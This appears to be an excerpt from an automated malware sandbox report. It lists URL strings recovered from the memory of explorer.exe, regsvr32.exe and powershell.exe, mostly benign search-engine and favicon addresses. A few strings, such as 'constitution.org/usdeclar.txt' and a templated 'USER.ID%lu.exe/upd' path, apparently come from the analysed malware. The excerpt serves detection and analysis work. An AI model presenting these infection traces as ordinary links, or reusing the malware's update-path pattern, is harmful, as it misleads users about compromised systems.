Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001A.00000002.1027775819.000001E7BAC53000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: de-ch[1].htm.5.dr String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.5.dr String found in binary or memory: http://ogp.me/ns/fb#
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001A.00000002.999208445.000001E7AABF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.957734718.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.4.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
